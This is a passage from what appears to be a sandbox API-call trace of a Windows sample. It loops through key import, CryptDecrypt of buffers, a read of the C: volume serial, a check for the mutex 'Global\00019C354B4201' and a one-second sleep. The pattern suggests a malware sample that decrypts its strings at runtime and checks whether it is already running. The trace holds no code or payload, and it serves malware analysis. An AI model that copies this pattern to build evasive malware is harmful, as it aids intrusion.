0x1db54e8 [0181.799] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0181.799] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0181.799] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0181.799] CryptDestroyKey (hKey=0x29c020) returned 1 [0181.799] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0181.799] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0181.799] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0181.799] CloseHandle (hObject=0x210) returned 1 [0181.799] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0181.799] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0181.799] Sleep (dwMilliseconds=0x3e8) [0182.816] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0182.816] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0182.817] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0182.817] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0182.817] CryptDestroyKey (hKey=0x29c020) returned 1 [0182.817] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0182.817] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0182.817] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0182.817] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0182.817] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0182.817] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0182.817] CryptDestroyKey (hKey=0x29c020) returned 1 [0182.817] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0182.817] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0182.817] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0182.817] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0182.817] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0182.817] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0182.817] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0182.817] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0182.817] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0182.817] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0182.817] CryptDestroyKey (hKey=0x29c020) returned 1 [0182.817] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0182.817] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0182.817] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0182.817] CloseHandle (hObject=0x210) returned 1 [0182.818] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0182.818] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0182.818] Sleep (dwMilliseconds=0x3e8) [0183.852] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0183.852] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0183.852] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0183.852] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0183.852] CryptDestroyKey (hKey=0x29c020) returned 1 [0183.852] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0183.852] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0183.852] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0183.852] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0183.852] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0183.852] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0183.852] CryptDestroyKey (hKey=0x29c020) returned 1 [0183.852] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0183.852] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0183.852] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0183.852] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0183.852] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0183.852] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0183.852] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0183.852] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0183.852] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0183.853] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0183.853] CryptDestroyKey (hKey=0x29c020) returned 1 [0183.853] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0183.853] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0183.853] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0183.853] CloseHandle (hObject=0x210) returned 1 [0183.853] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0183.853] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0183.853] Sleep (dwMilliseconds=0x3e8) [0184.859] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0184.859] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0184.859] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0184.859] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0184.859] CryptDestroyKey (hKey=0x29c020) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0184.859] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0184.859] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0184.859] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0184.860] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0184.860] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0184.860] CryptDestroyKey (hKey=0x29c020) returned 1 [0184.860] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0184.860] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0184.860] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0184.860] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0184.860] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0184.860] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0184.860] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0184.860] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0184.860] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0184.860] CryptDestroyKey (hKey=0x29c020) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0184.860] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0184.860] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0184.860] CloseHandle (hObject=0x210) returned 1 [0184.860] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0184.860] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0184.860] Sleep (dwMilliseconds=0x3e8) [0185.875] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0185.875] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0185.875] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0185.875] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0185.875] CryptDestroyKey (hKey=0x29c020) returned 1 [0185.875] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0185.875] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0185.875] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0185.875] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0185.875] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0185.875] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0185.875] CryptDestroyKey (hKey=0x29c020) returned 1 [0185.875] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0185.875] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0185.875] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0185.875] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0185.875] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0185.876] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0185.876] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0185.876] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0185.876] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0185.876] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0185.876] CryptDestroyKey (hKey=0x29c020) returned 1 [0185.876] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0185.876] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0185.876] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0185.876] CloseHandle (hObject=0x210) returned 1 [0185.876] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0185.876] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0185.876] Sleep (dwMilliseconds=0x3e8) [0186.928] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0186.928] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0186.928] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0186.928] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0186.928] CryptDestroyKey (hKey=0x29c020) returned 1 [0186.928] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0186.928] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0186.928] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0186.928] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0186.928] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0186.928] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0187.008] CryptDestroyKey (hKey=0x29c020) returned 1 [0187.008] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0187.008] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0187.008] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0187.008] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0187.008] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0187.008] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0187.008] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0187.008] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0187.008] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0187.008] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0187.008] CryptDestroyKey (hKey=0x29c020) returned 1 [0187.008] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0187.008] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0187.008] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0187.008] CloseHandle (hObject=0x210) returned 1 [0187.008] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0187.008] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0187.008] Sleep (dwMilliseconds=0x3e8) [0188.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0188.019] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0188.019] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0188.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0188.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0188.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0188.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0188.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0188.019] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0188.019] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0188.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0188.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0188.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0188.019] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0188.020] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0188.020] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0188.020] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0188.020] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0188.020] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0188.020] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0188.020] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0188.020] CryptDestroyKey (hKey=0x29c020) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0188.020] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0188.020] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0188.020] CloseHandle (hObject=0x210) returned 1 [0188.020] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0188.020] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0188.020] Sleep (dwMilliseconds=0x3e8) [0189.082] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0189.082] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0189.082] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0189.082] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0189.082] CryptDestroyKey (hKey=0x29c020) returned 1 [0189.082] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0189.082] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0189.082] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0189.082] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0189.082] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0189.082] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0189.082] CryptDestroyKey (hKey=0x29c020) returned 1 [0189.082] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0189.082] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0189.082] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0189.082] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0189.082] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: 